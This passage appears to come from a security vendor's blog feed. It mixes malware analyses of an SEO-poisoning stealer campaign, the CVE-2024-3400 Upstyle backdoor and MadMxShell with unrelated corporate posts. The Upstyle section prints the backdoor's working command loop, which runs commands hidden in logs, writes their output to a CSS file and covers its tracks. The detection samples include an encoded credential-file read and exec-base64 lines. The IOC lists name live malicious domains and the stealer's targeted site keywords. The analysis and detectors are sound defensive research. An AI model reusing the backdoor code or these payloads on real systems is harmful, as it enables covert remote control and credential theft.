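     "cmdline": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\dropped.dll,Start"},
    {"id": "e3", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" '
                r'--load-extension="C:\Users\alice\AppData\Local\Default"'},
    # Benign controls: an admin script run from cmd.exe and an ordinary browser start.
    {"id": "e4", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"},
    {"id": "e5", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" https://intranet.example'},
]

# Directories an unprivileged user can write to; a DLL executed from one is suspect.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Desktop|Public)\\", re.IGNORECASE)
# "-windowstyle hidden" as seen in the campaign, plus the abbreviated "-w hidden".
HIDDEN_WINDOW = re.compile(r"(^|\s)-w(indowstyle)?\s+hidden\b", re.IGNORECASE)


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def hidden_powershell_from_explorer(ev: Event) -> bool:
    return (_basename(ev["parent"]) == "explorer.exe"
            and _basename(ev["image"]) == "powershell.exe"
            and HIDDEN_WINDOW.search(ev["cmdline"]) is not None)


def rundll32_from_user_writable_path(ev: Event) -> bool:
    return (_basename(ev["image"]) == "rundll32.exe"
            and USER_WRITABLE.search(ev["cmdline"]) is not None)


def chrome_with_load_extension(ev: Event) -> bool:
    # Unpacked extensions are rarely loaded this way outside development.
    return (_basename(ev["image"]) == "chrome.exe"
            and "--load-extension" in ev["cmdline"].lower())


RULES: Dict[str, Callable[[Event], bool]] = {
    "hidden_powershell_from_explorer": hidden_powershell_from_explorer,
    "rundll32_from_user_writable_path": rundll32_from_user_writable_path,
    "chrome_with_load_extension": chrome_with_load_extension,
}


def scan(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (event id, rule name) for every rule that fires, in event order."""
    return [(ev["id"], name) for ev in events for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for event_id, rule_name in scan(SAMPLE_EVENTS):
        print(f"{event_id}: {rule_name}")
```

The two benign control events show the rules are keyed on the combination of parent, image and argument rather than on PowerShell or Chrome alone.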
Network Analysis

After the initial execution through DLL sideloading, a malicious PowerShell script establishes communication with aprel88[.]com/getLicenseInfo.php?requirements=time&checkMethod=2 through a GET request. The malicious hollowed explorer.exe process initiates two transactions to download a malicious DLL from t9z[.]lol/imvLbzv05W and a BIN file from 1blob[.]monster/pidaras/142.bin. Subsequently, the malicious DLL is executed using rundll32.exe. Further malicious activity linked to a PowerShell script was also observed. Notably, the domain good2-led[.]com is identified as the source responsible for downloading files associated with a browser extension. The screenshot below shows the malicious network traffic.

Figure 12: A screenshot of the malicious traffic.

Upon initiating the Chrome browser through its shortcut, a malicious extension is loaded, triggering communication with a malicious C2 server. Before this communication takes place, the extension sends a request to blockchain.info, specifically to the URL blockchain.info/address/{address}, utilizing the Bitcoin address bc1qnxwt7sr3rqatd6efjyym3nsgxhslyzeqndhjpn. In response, the extension retrieves a Base58-encoded string, which upon decoding, discloses the location of the C2 server. The address 1A9mJv7MHkSzMqe4TEdfyttEz9ZcZugyLR was returned as a result of this request. Decoding this string reveals the domain dark-confusion[.]com, the C2 server location carried by that address.
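The dead-drop resolution described above, as an added example that is not code from the blog or from the malware: the quoted address is decoded as plain Base58Check (version byte, 20-byte hash field, 4-byte double-SHA256 checksum) and the domain is read out of the hash field. That the domain sits in the field which would normally hold a public-key hash is an assumption drawn from the blog's description, so the function tolerates an unknown padding layout by taking the longest domain-looking run.

```python
import hashlib
import re
from typing import Optional, Tuple

# Bitcoin's Base58 alphabet (no 0, O, I or l).
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def base58_decode(text: str) -> bytes:
    """Decode Base58 text to bytes; each leading '1' becomes one leading 0x00 byte."""
    value = 0
    for ch in text:
        digit = B58_ALPHABET.find(ch)
        if digit < 0:
            raise ValueError(f"not a Base58 character: {ch!r}")
        value = value * 58 + digit
    body = value.to_bytes((value.bit_length() + 7) // 8, "big") if value else b""
    leading_zeros = len(text) - len(text.lstrip("1"))
    return b"\x00" * leading_zeros + body


def decode_address(addr: str) -> Tuple[int, bytes, bool]:
    """Split a Base58Check address into (version byte, 20-byte hash field, checksum_ok).

    The checksum is the first 4 bytes of SHA256(SHA256(version + hash field)); it is
    reported rather than enforced so a mistyped address still yields the field."""
    raw = base58_decode(addr)
    if len(raw) != 25:
        raise ValueError(f"expected 25 decoded bytes, got {len(raw)}")
    digest = hashlib.sha256(hashlib.sha256(raw[:21]).digest()).digest()
    return raw[0], raw[1:21], raw[21:] == digest[:4]


def extract_c2_domain(addr: str) -> Optional[str]:
    """Return the domain smuggled in the hash field, or None if nothing domain-like is there.

    Assumption (from the blog's description): the 20-byte field holds an ASCII domain
    plus padding, so the longest run of domain characters is the answer."""
    _, hash_field, _ = decode_address(addr)
    runs = re.findall(rb"[A-Za-z0-9][A-Za-z0-9.-]*[A-Za-z0-9]", hash_field)
    return max(runs, key=len).decode("ascii") if runs else None


if __name__ == "__main__":
    # Address the blog reports as the value returned by the blockchain.info query.
    ADDRESS = "1A9mJv7MHkSzMqe4TEdfyttEz9ZcZugyLR"
    version, hash_field, ok = decode_address(ADDRESS)
    print(f"version=0x{version:02x} checksum_ok={ok} hash_field={hash_field!r}")
    print("dead drop resolves to:", extract_c2_domain(ADDRESS))
```

The HTTP request to blockchain.info is deliberately left out; in practice the address is taken from the transaction output returned for the hard-coded bc1q… address and handed to extract_c2_domain so the resolved domain can be blocked and hunted for.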
Information Theft

After initiating communication with the C2 server, the malicious extension engages in information theft, gathering a wide range of data including:

- System information
- Browser cookies
- Browser fingerprints
- Credentials
- Machine information
- Browser extensions
- Extension permissions
- Cookies
- Browser history

During communication with the C2 server, the malware responds with a list of strings such as: onedrive, bankofamerica.com, billing, ads.microsoft.com, secure, digicert, coinbase, evernote, crypto, admin.

Note: It's important to monitor traffic associated with these keywords. See the Indicators Of Compromise (IOCs) section at the end of the blog for additional strings associated with stealer activity.

Additionally, it possesses the capability to inject code into web-based email applications through two JavaScript files: gmail.js and main.js. It specifically targets messages related to cryptocurrency trading across various exchanges such as OKX, Binance, Bybit, Gate, Poloniex, Mexc, Bitget, Kucoin, Huobi, and Lbank. Figures 13 and 14, shown below, show a portion of the script responsible for these activities. The script employs the checkWithdrawalLetter function, highlighted in the screenshot below, to scrutinize emails for withdrawal requests associated with cryptocurrency trading. Upon identifying a match, it proceeds to modify the email content to resemble a sign-in email, thereby altering the appearance for deceptive purposes. Additionally, it includes functionality within the getCode function, highlighted in the figure below, to extract and validate six-digit authentication codes received via email using regular expressions.

Figure 13: JavaScript code that monitors and modifies email content.

The screenshot below shows a list of cryptocurrency exchanges and titles required for email modification.

Figure 14: List of cryptocurrency exchanges and titles required for email modification.

The screenshot below shows the post-infection network traffic.
Figure 15: A screenshot of post-infection traffic.

Conclusion

This campaign underscores the exploitation of user behavior by attackers who leverage Black Hat SEO, specifically SEO poisoning, to spread malware, ultimately aiming to extort victims for financial gain and other benefits. These analyzed campaigns rely on users' engagement with seemingly “trustworthy” websites to initiate the infection process. Individuals can effectively prevent such harmful infections by refraining from downloading software from suspicious sources. Instead, they should prioritize visiting reputable websites and exclusively download software from trustworthy sources.

Zscaler Coverage

Advanced Threat Protection
- JS.Trojan.Agent
- HTML.Phish.SEO
- W32/Satacom.C.gen!Eldorado
- W32/Kryptik.LQU.gen!Eldorado

Advanced Cloud Sandbox

During our investigation of this campaign, the Zscaler Cloud Sandbox played a significant role in analyzing the behavior of multiple files.

Figure 16: Zscaler Cloud Sandbox report

Indicators Of Compromise (IOCs)

- aprel88[.]com/getLicenseInfo.php?requirements=time&checkMethod=2
- t9z[.]lol/imvLbzv05W
- good2-led[.]com/dark4.bs64
- 1blob[.]monster/pidaras/142.bin
- dark-confusion[.]com
Strings: eigenlayer, trbinance, publisher, checkout, onedrive, azurewebsites, billing, secure, digicert, coinbase, evernote, crypto, admin, dashboard, cashier, bitwarden, opensea, metamask, exchange, wallet, swap, tradeogre, stake, mining, steamcommunity, dana-na, remote, global-protect, cscoe, citrix, LogonPoint, screenconnect, XenApp, vpn, silentDetection, rdweb, microsoftonline, stripe.com, privateemail.com, ads.google, adsense.google.com, admin.booking.com, ads.microsoft.com, business.facebook.com, ads.facebook, adsmanager.facebook, payments.google.com, pay.google.com, virustotal.com, bankofamerica.com

Wed, 24 Apr 2024 08:31:01 -0700 Kaivalya Khursale https://www.zscaler.com/blogs/security-research/black-hat-seo-leveraged-distribute-malware
Congratulations to our 2024 Zscaler Partners of the Year https://www.zscaler.com/blogs/company-news/2024-zscaler-partners-of-the-year

Last week at the Zscaler Americas Executive Partner Summit we announced our 2024 Americas Partners of the Year. The Zscaler Partner Ecosystem is a key differentiator and force multiplier for us in the market, spanning deep technology integrations, key consultancy partnerships, and solutions and services partners. We have the best partners in the business. Our thriving partner ecosystem continues to grow and excel as we secure and serve the world’s largest and most renowned organizations. And our partners continue to select and invest in Zscaler as the leading Zero Trust and AI vendor in their portfolio. While each partner is unique, this year’s cohort of winners have all demonstrated significant business growth, innovation, and investments with Zscaler. We are winning together.

To each of our award winners, THANK YOU for your hard work and dedication, and for consistently investing in our partnership. The co-development, innovation, and customer obsession we share enables us to better serve and secure organizations all over the world. We are stronger together, delivering superior business outcomes in the ever evolving digital transformation landscape.

Congratulations to our esteemed 2024 Americas Partner of the Year Award Winners:

- Partner of the Year: World Wide Technology
- GSI Partner of the Year: Accenture
- Go-to-Market Alliance Partner of the Year: CrowdStrike
- Cloud Alliance Partner of the Year: AWS
- Zero Trust Solution Partners of the Year: CrowdStrike & Okta
- Emerging Tech Partner of the Year: Rubrik
- GSI Managed Zero Trust Security Partner of the Year: Wipro
- GSI Growth Partner of the Year: Infosys
- Services Partner of the Year: Optiv
- Growth Partner of the Year: SHI
- PubSec Partner of the Year: Red River
- New Logo Partner of the Year: CDW

These awards recognize our partners who have gone above and beyond, and excelled in our ecosystem.
We are proud and grateful for these partnerships as we jointly deliver unparalleled customer experiences and innovation. Thank you to each of our award winners for your partnership. We cannot wait to see all of the great achievements in the years to come.

Fri, 19 Apr 2024 10:49:53 -0700 Karl Soderlund https://www.zscaler.com/blogs/company-news/2024-zscaler-partners-of-the-year

Zscaler Supports Steve Gibbins' Tour 21 Fundraising https://www.zscaler.com/blogs/zscaler-life/zscaler-supports-steve-gibbins-tour-21-fundraising

Every year, 176 cyclists and millions of spectators descend on France for one of the most gruelling sporting events in the world, le Tour de France. A race steeped in history, and those who line the streets – and the billions of spectators who tune in on TV – do their utmost to empathise with the pain and suffering of the professionals as they ascend climbs such as Alpe d’Huez and Mont Ventoux. Few people truly understand the grit, determination, and fitness needed to complete the race. However, the team at Tour 21 are all too familiar with the demanding requirements of le Tour. Every year, one week ahead of the official race, a team of 15 amateur cyclists take to the tarmac and ride the full Tour de France route, and all in the name of a good cause.

We’re very excited to share that Zscaler will be supporting Steve Gibbins’ Tour 21 Fundraiser for Cure Leukaemia, a blood cancer charity providing patients with access to new and potentially lifesaving treatments by facilitating clinical trials. While great progress is being made, Cure Leukaemia’s work remains vital for so many people.
In fact, according to Cancer Research UK:

- There are almost 10,000 new cases of leukaemia each year
- 4,830 people died from leukaemia between 2017 – 2019
- 41% of people survive leukaemia for 10 or more years
- 12% of leukaemia cases are preventable

Alongside being an enthusiastic amateur cyclist, Steve is the Head of Networks at Jaguar Land Rover (JLR), responsible for the cloud-infrastructure transformation of the organisation, a longstanding client of Zscaler and valued customer since 2017. As Steve embarks on the daunting Tour 21 challenge alongside 15 other amateur cyclists, covering an astounding 3500 km in just 21 days from Florence to Nice, his mission to raise £1 million for Cure Leukaemia is nothing short of inspirational.

“Seeing and understanding the incredible work that Cure Leukaemia is doing through the Trial Acceleration Programme, and the incredible progress that has been achieved so far by them, is truly inspirational. However, there is still a way to go before this terrible disease is completely beaten, which is why raising this money is so incredibly important. Zscaler’s support has been truly outstanding and puts fuel in my tank on those tough training days, knowing that this amazing organisation is behind me all the way”, Steve Gibbins adds.

At Zscaler, we’re proud to support one of JLR’s champions as he pedals towards his ambitious fundraising goal, embodying the spirit of perseverance, community, and hope. Hence we have donated £10,000 already, which has contributed to half of Steve’s fundraising target – but our support doesn’t end there. To bolster our backing, we rallied our London-based team together for a group spin class last week. With over 20 colleagues and Steve himself in attendance, the collective effort provided a huge source of motivation and inspiration as well as showing great team spirit for the cause.
Considering how challenging the spin class was for us, we commend Steve, as riding 3500 km and climbing more than 52,000 altitude metres in the French and Italian Alps as well as the Pyrenees seems unfathomable!

Roxy Uddin, proud participant of the spin class, comments: “Having worked alongside Steve Gibbins and his cloud transformation journey for JLR for two years now, I'm so proud that Zscaler are able to support Steve as he takes on this huge challenge. The spin class itself was great fun (and tougher than expected!) and really brought the whole Zscaler team together to focus on this bigger fundraising task.”

On April 23rd, we take the team spirit and fundraising activities to the next level. We’re coming together with JLR at the Velodrome in London, to dive deeper into the Tour 21 feeling, telling you more about Steve's fundraising journey with insights from guest speakers representing charities raising awareness about leukaemia and Tour 21 itself. But that’s not all… we’ll be hopping on our bikes for an exciting track cycling session afterwards. We're excited to have so many people join us to help Steve to fundraise and spread the word for Cure Leukaemia. You still have time to sign up for our Velodrome Track Day, and you can check out the complete schedule at the link below. We hope to see you there!

Fri, 19 Apr 2024 05:29:48 -0700 Paul Hennin https://www.zscaler.com/blogs/zscaler-life/zscaler-supports-steve-gibbins-tour-21-fundraising

A Look at CVE-2024-3400 Activity and Upstyle Backdoor Technical Analysis https://www.zscaler.com/blogs/security-research/look-cve-2024-3400-activity-and-upstyle-backdoor-technical-analysis

Introduction

Recently, a zero-day command-injection vulnerability, assigned to CVE-2024-3400, was found in the Palo Alto Networks PAN-OS.
It was assigned the maximum severity score of 10.0 and can be exploited by an unauthenticated user to run arbitrary commands on the target system with root privileges. Volexity was the first to identify and report the vulnerability. Since then, the Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2024-3400 to its Known Exploited Vulnerability Catalog.

In this blog, we will share the vulnerability exploitation activity observed by Zscaler’s global intelligence network. And, we will examine the recently-discovered Python-based backdoor and its novel interaction mechanism with the operator.

Key Takeaways

- Zscaler’s global intelligence network picked up CVE-2024-3400 activity right after the exploitation script was released.
- The backdoor utilizes a .pth file for auto-execution and employs a novel indirect interaction with the backdoor by sending commands via error logs and receiving the output through a publicly accessible stylesheet.
- On the same day the vulnerability was publicly disclosed, a Python-based exploit script was also released to the public on GitHub, making it easier for other threat actors to exploit or test Palo Alto appliances for this vulnerability.

Activity Observed by Zscaler

Zscaler’s global intelligence network picked up activity from various known malicious sources targeting appliances across multiple customers. This activity was picked up almost immediately after the publication of the exploitation script on GitHub. The activity does not appear to target any particular region or industry vertical.

Most of the activity observed originated from malicious IPs already known to be associated with vulnerability scanning, Redline Stealer, and EvilProxy. However, one IP stands out from this group. We believe the IP address 67.55.94[.]84 is associated with a VPN provider. No other activity from this IP has been observed.
Currently, there is insufficient evidence to attribute this IP to any specific threat actor.

Technical Analysis

We suspect the attackers intended to incorporate Upstyle in their attack sequence. Upstyle, a sophisticated backdoor initially identified by Volexity, employs innovative techniques for persistence, command reception, and output sharing with the operator.

Attack flow

The figure below shows how the attack flow would unfold.

Figure 1: The possible firewall-based attack chain enabled by the PAN-OS zero-day vulnerability.

Upstyle backdoor

The Upstyle backdoor consists of three layers. The first outer layer is the installer which contains the next layer in a base64-encoded format.

Layer 1 - Installer

The installer layer writes the next layer to the following path: /usr/lib/python3.6/site-packages/system.pth. Additionally, it will set the last access time and last modified time of the system.pth file to the same respective time as the installer script. Finally, the installer script deletes itself and the /opt/pancfg/mgmt/licenses/PA_VM* file.

The file path and the extension have special significance. Since the release of Python 3.5, any .pth file under site-packages is run at every Python startup and the lines starting with import (followed by space or tab) are executed, thereby setting up a unique auto-execution mechanism for the malicious code whenever any Python code is run on the system.

Layer 2 - Launcher

This layer contains the functional backdoor as another base64-encoded blob of code. It contains two functions named protect and check.

- protect: This function likely protects the persistence mechanism and makes sure the backdoor stays in the system.pth file. It reads the contents of system.pth and adds a handler for the termination signal. The handler will write back the contents of the system.pth file before terminating.
- check: This method is called after the protect method.
It will check if the process command line contains /usr/local/bin/monitor mp by checking the file /proc/self/cmdline. If it does, the backdoor code will be executed. This could be a way to control the execution of the backdoor and avoid running multiple duplicates of the backdoor thread.

Layer 3 - Backdoor

On start, this backdoor will read the content, last access time, and last modified time of the file /var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css so it can be restored later. Then, it goes into an infinite loop and starts monitoring the error log file at /var/log/pan/sslvpn_ngx_error.log looking for one of the following regular expressions: img\[([a-zA-Z0-9+/=]+)\] or img\{base64encoded_command}\ as shown in the code snippet below. When the pattern is found, the command is base64 decoded, executed, and the output is appended to the bootstrap.min.css file inside the comment tags, /* {command output here} */. Finally, the log file is purged of the attacker’s generated error logs containing the malicious commands, and the error-log-file timestamps are restored.
After 15 seconds the content and timestamps of the bootstrap.min.css file are also restored.-- [snip] -- css_path = '/var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css' content = open(css_path).read() atime=os.path.getatime(css_path) mtime=os.path.getmtime(css_path) while True: try: SHELL_PATTERN = 'img\[([a-zA-Z0-9+/=]+)\]' lines = [] WRITE_FLAG = False for line in open("/var/log/pan/sslvpn_ngx_error.log",errors="ignore").readlines(): rst = re.search(SHELL_PATTERN,line) if rst: WRITE_FLAG = True cmd = base64.b64decode(rst.group(1)).decode() try: output = os.popen(cmd).read() with open(css_path,"a") as f: f.write("/*"+output+"*/") except Exception as e: pass continue lines.append(line) if WRITE_FLAG: atime=os.path.getatime("/var/log/pan/sslvpn_ngx_error.log") mtime=os.path.getmtime("/var/log/pan/sslvpn_ngx_error.log") with open("/var/log/pan/sslvpn_ngx_error.log","w") as f: f.writelines(lines) os.utime("/var/log/pan/sslvpn_ngx_error.log",(atime,mtime)) import threading threading.Thread(target=restore,args=(css_path,content,atime,mtime)).start() except: pass time.sleep(2) -- [snip] --- ConclusionCVE-2024-3400 is a high severity vulnerability. There was an uptick in malicious activity soon after an exploit script was released to the public on GitHub.The founding principles of the Zero Trust Exchange Platform™, a zero trust architecture, and Defense-in-Depth (DiD) should be used in combination to defend against such attacks. In addition to deploying detection rules and monitoring for suspicious activity in environments, security teams should also adopt deception engineering. 
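The persistence and command channel described above leave artifacts that can be checked for. The following is an added example written for this article, not code from the Upstyle sample or from the ThreatLabz post. It applies Python's own .pth rule (lines beginning with import plus a space or tab are executed) to flag executable .pth lines that decode or exec embedded code, extracts and decodes img[...] markers from nginx error-log lines using the same regular expression the backdoor uses, and lists comment blocks appended after a known-good copy of bootstrap.min.css. The .pth content, log lines, and CSS are constructed samples, not data from the incident. Because the backdoor rewrites the log and restores the CSS within seconds, the log and CSS checks are most useful against log data forwarded elsewhere or against a forensic image.

```python
import base64
import binascii
import re

# Same pattern the Upstyle backdoor searches for in sslvpn_ngx_error.log.
SHELL_PATTERN = re.compile(r"img\[([a-zA-Z0-9+/=]+)\]")
# Tokens that make an import-time .pth line worth a look (heuristic, not exhaustive).
SUSPICIOUS_TOKENS = ("exec(", "eval(", "b64decode", "compile(", "marshal.loads")

# Constructed sample .pth: a path entry, a benign import line, and an Upstyle-style line.
SAMPLE_PTH = (
    "/usr/lib/python3.6/site-packages/somepkg\n"
    "import sys; sys.path.append('/opt/vendor/lib')\n"
    "import base64,sys;exec(base64.b64decode(b'cHJpbnQoJ2hlbGxvJyk='))\n"
)
# Constructed nginx error-log lines: one normal, two valid markers, one malformed marker.
SAMPLE_LOG = (
    '2024/04/12 10:00:01 [error] 1234#0: *1 upstream timed out\n'
    '2024/04/12 10:00:03 [error] 1234#0: *2 open() "/img[aWQ=]" failed\n'
    '2024/04/12 10:00:07 [error] 1234#0: *3 open() "/img[Y2F0IC9ldGMvcGFzc3dk]" failed\n'
    '2024/04/12 10:00:09 [error] 1234#0: *4 open() "/img[abc]" failed\n'
)
# Constructed stand-ins for the vendor CSS and a copy with appended command output.
CLEAN_CSS = "body{margin:0}"
TAMPERED_CSS = CLEAN_CSS + "/*uid=0(root) gid=0(root)\n*/"


def executable_pth_lines(pth_text: str) -> list:
    """Lines site.py would exec() instead of treating as a path entry:
    those beginning with 'import' followed by a space or tab."""
    return [ln for ln in pth_text.splitlines() if ln.startswith(("import ", "import\t"))]


def suspicious_pth_lines(pth_text: str) -> list:
    """Executable .pth lines that decode or compile code at import time."""
    return [ln for ln in executable_pth_lines(pth_text)
            if any(tok in ln for tok in SUSPICIOUS_TOKENS)]


def extract_commands(log_text: str) -> list:
    """Pull img[<base64>] markers out of error-log lines and decode them.
    A marker that is not valid base64/UTF-8 is reported as None rather than skipped."""
    cmds = []
    for line in log_text.splitlines():
        m = SHELL_PATTERN.search(line)
        if not m:
            continue
        try:
            cmds.append(base64.b64decode(m.group(1), validate=True).decode())
        except (binascii.Error, UnicodeDecodeError):
            cmds.append(None)
    return cmds


def appended_css_comments(css_text: str, clean_css: str) -> list:
    """Comment blocks appended after the known-good CSS, i.e. Upstyle's output slots."""
    if not css_text.startswith(clean_css):
        return []
    return re.findall(r"/\*(.*?)\*/", css_text[len(clean_css):], flags=re.S)


if __name__ == "__main__":
    print("executable .pth lines:", executable_pth_lines(SAMPLE_PTH))
    print("suspicious .pth lines:", suspicious_pth_lines(SAMPLE_PTH))
    print("commands in log:", extract_commands(SAMPLE_LOG))
    print("appended CSS comments:", appended_css_comments(TAMPERED_CSS, CLEAN_CSS))
```

A benign import line in a .pth file (setuptools-style packages install them) is normal, which is why the check looks for decode-and-exec constructs rather than flagging every import line; compare any hit against the file's timestamps as well, since the installer deliberately backdates system.pth.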
Strategic use of this technology can make it difficult for an adversary to move through the environment without tripping alerts.

Indicators Of Compromise (IOCs)

Vulnerability scan originating IPs

IP | Comment
23.227.194.230 | Known malicious IP
154.88.26.223 | Known malicious IP
206.189.14.205 | Known malicious IP
67.55.94.84 | SaferVPN IP

SHA256 hashes

ab3b9ec7bdd2e65051076d396d0ce76c1b4d6f3f00807fa776017de88bebd2f3
3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
949cfa6514e499e28aa32feba800181558e60455b971206aa5aa601ea1f55605
710f67d0561c659aecc56b94ee3fc82c967a9647c08451ed35ffa757020167fb

Wed, 17 Apr 2024 18:11:50 -0700 Atinderpal Singh https://www.zscaler.com/blogs/security-research/look-cve-2024-3400-activity-and-upstyle-backdoor-technical-analysis

How the Zscaler SaaS Security and Data Discovery Reports Are Healthcare's Superheroes
https://www.zscaler.com/blogs/product-insights/how-zscaler-saas-security-and-data-discovery-reports-are-healthcare-s

SaaS Security Report: A Not-So-Secret Identity

Imagine a world where the heroes don't wear capes, but wield reports. And not just any reports: we're talking about the Zscaler SaaS Security Report, a document powerful enough to illuminate the darkest corners of healthcare organizations' IT environments. Picture shadow IT as a quirky sidekick who means well but always ends up downloading rogue software that promises to "make work easier" or "automatically order pizza on Fridays." Shadow IT is like the friendly custodian who "helps" organize your supply closet, and then you suddenly can't find your gloves or the superhero bandages for the pediatric patients. They're there somewhere, hidden behind the paper towel rolls on the top shelf. Enter Zscaler, swinging in to reveal these well-intentioned but potentially hazardous endeavors.
By identifying unsanctioned apps and services, the SaaS Security Report helps healthcare organizations wrangle the chaos, securing the network while still allowing for innovation (and maybe the occasional pizza).

Data Discovery Report: The Unsung Hero

On the other side, we have the Data Discovery Report. This is our answer to the eternal question: "Where did I leave that incredibly sensitive patient data?" Think of it as the healthcare organization's memory enhancer, ensuring that no piece of critical information ends up in the wrong hands or, worse, on a USB stick in the washing machine. This report is like an organizational expert for data, categorizing and securing it in ways that would make any mom proud. It tells you exactly where your data lives, breathes, and occasionally goes out for a walk, making sure it's always safe and sound. It's particularly adept at flagging data that's decided to take an unscheduled vacation outside the secure confines of the healthcare network, like when your staff decide "Print to PDF" isn't working, so they use a free converter they find on the internet. With the Data Discovery Report, you can see exactly who did that and which files they uploaded.

The Dynamic Duo's Adventures

Together, the SaaS Security Report and the Data Discovery Report are the dynamic duo of the healthcare IT world, fighting data breaches and compliance issues with the power of insight and analysis. They roam the digital corridors of hospitals and clinics, doing their part to keep patient data as secure as the pharmacy.

Episode 1: The Case of the Vanishing Patient Records

In this thrilling adventure, our heroes face mysteriously disappearing patient records.
The SaaS Security Report, with its keen eye for detail, finds that a well-meaning staff member has been using an unsanctioned cloud storage service to make their work "more efficient." Meanwhile, the Data Discovery Report, always the detective, pinpoints exactly which files went on this unauthorized excursion.

Episode 2: The Saga of the Shadowy Software

This time, a shadowy figure has infiltrated the network with software promising to "revolutionize patient care." Spoiler alert: it created a gaping security hole instead. But fear not! With the help of the SaaS Security Report and Data Discovery Report, IT staff quickly unmask the rogue application.

The Moral of the Story

In the end, the Data Discovery Report and SaaS Security Report don't just improve a healthcare organization's security posture; they do it with flair, bringing a smile to even the most overworked IT professional's face. You can now see exactly which apps your users are using so that you can create policy, or see if someone is taking data they shouldn't and uploading it to a mysterious destination. With these two reports, your IT team can perform even greater feats of heroism. Want to know more? Visit our Healthcare page!

Tue, 16 Apr 2024 13:59:17 -0700 Steven Hajny https://www.zscaler.com/blogs/product-insights/how-zscaler-saas-security-and-data-discovery-reports-are-healthcare-s

Malvertising campaign targeting IT teams with MadMxShell
https://www.zscaler.com/blogs/security-research/malvertising-campaign-targeting-it-teams-madmxshell

Introduction

Beginning in March 2024, Zscaler ThreatLabz observed a threat actor weaponizing a cluster of domains masquerading as legitimate IP scanner software sites to distribute a previously unseen backdoor. The threat actor registered multiple look-alike domains using typosquatting and leveraged Google Ads to push these domains to the top of search results for specific keywords, luring victims to visit these sites.
The newly discovered backdoor uses several techniques, including multiple stages of DLL sideloading, abuse of the DNS protocol to communicate with the command-and-control (C2) server, and evasion of memory forensics tooling. We named this backdoor "MadMxShell" for its use of DNS MX queries for C2 communication and its very short interval between C2 requests. In this blog, we examine the campaign details and the threat actor's infrastructure, and provide a detailed technical analysis of the backdoor. We have also shared a custom Python script to decode C2 traffic for malware samples and all the Indicators of Compromise (IOCs) linked to this campaign.

Key Takeaways

- Between November 2023 and March 2024, a threat actor registered multiple domains spoofing legitimate IP scanners and other software typically used by enterprise IT security and network administration teams.
- The threat actor abused Google Ads to run a malvertising campaign that pushed their malicious sites to the top of search results.
- A successful infection delivers a previously unseen backdoor that we named "MadMxShell".
- The backdoor uses multiple stages of DLL sideloading and DNS tunneling for C2 communication to evade endpoint and network security solutions, respectively.
- The backdoor also uses anti-dumping techniques to prevent memory analysis and hinder forensics tooling.

Background

The software this threat actor chose to spoof suggests that their targets are primarily IT professionals, particularly those in IT security and network administration roles. This aligns with a recent trend in which advanced persistent threat (APT) groups, such as NOBELIUM, crafted attacks targeting these teams.
With their privileged access to internal systems and networks, IT security and network management teams are attractive targets for both APT groups and initial access brokers (IABs) that sell access to compromised networks. Although we have not yet attributed the attack described in this blog to a specific threat actor, the trend is worth highlighting.

Threat actors have previously used Google malvertising to distribute trojanized versions of a specific port scanning tool, Advanced IP Scanner, as described in reports by Kaspersky, BlackBerry, and Huntress. Although the campaign discussed here uses a similar distribution method, the range of spoofed software has been expanded well beyond Advanced IP Scanner. Furthermore, to the best of our knowledge, the final malware delivered in this campaign has not been publicly documented before. Given these differences, we assess with high confidence that this campaign was conducted by a different threat actor.

Attack Chain

The figure below illustrates the multi-stage attack chain at a high level.

Figure 1: The MadMxShell end-to-end attack chain, which starts with malvertising, followed by multiple intermediate stages of DLL sideloading, and finally DNS tunneling to the C2 server.

Technical Analysis

In the following sections, we provide a detailed analysis of each stage of the attack chain.

Google malvertising campaign

The threat actor's modus operandi is to register multiple look-alike domains spoofing popular port scanning software and push them to the top of Google search results by running Google Ads campaigns. This technique is widely known as malvertising.
During our investigation, we observed users being served these ads when they searched for keywords related to any of the following:

- Any of the legitimate port scanning and IT management software spoofed by this threat actor: Advanced IP Scanner, Angry IP Scanner, PRTG IP Scanner by Paessler, ManageEngine
- Network admin tasks related to virtual local area networks (VLANs)
- Scanning IP protocol

The figure below shows details of the Google Ads campaign the threat actor ran in March 2024 for one of the malicious domains. The domain in question was advanced-ip-scanz[.]net, and the search keywords were "advanced ip scanner" and "ip address scanner".

Figure 2: Details of the Google Ads campaign in March 2024 for the malicious domain advanced-ip-scanz[.]net.

Once the user clicks on any of the attacker-controlled Google Ads, they are redirected to a look-alike site for the corresponding IP scanning software.

Malicious sites

The threat actor registered multiple sites masquerading as legitimate IP and port scanner software programs. One such site we observed is advansed-ip-scanner[.]net, a look-alike of the legitimate Advanced IP Scanner site www.advanced-ip-scanner[.]com. The complete source code of the fraudulent website mirrors the legitimate site, with the exception of minor edits the threat actor made to the JavaScript (JS) code so that clicking the download button sends the user to a malicious file. The figure below compares the altered JS code from the malicious site with the original legitimate website. The createFunctionWithTimeout function was modified to redirect users to download a malicious ZIP archive from the following URL: advansed-ip-scanner[.]net/yftyudruo.php.

Figure 3: JavaScript code comparison between the legitimate website's createFunctionWithTimeout function and the malicious website's code.
Backdoor Details - Binary Analysis

Stage 1 injector

The analysis in this blog is based on this ZIP archive: Advanced-ip-scanner.zip (SHA256: 7966ee1ae9042e7345a55aa98ddeb4f39133216438d67461c7ee39864292e015). The ZIP archive contains two files:

- Advanced-ip-scanner.exe: a renamed copy of the legitimate Microsoft EXE oleview.exe.
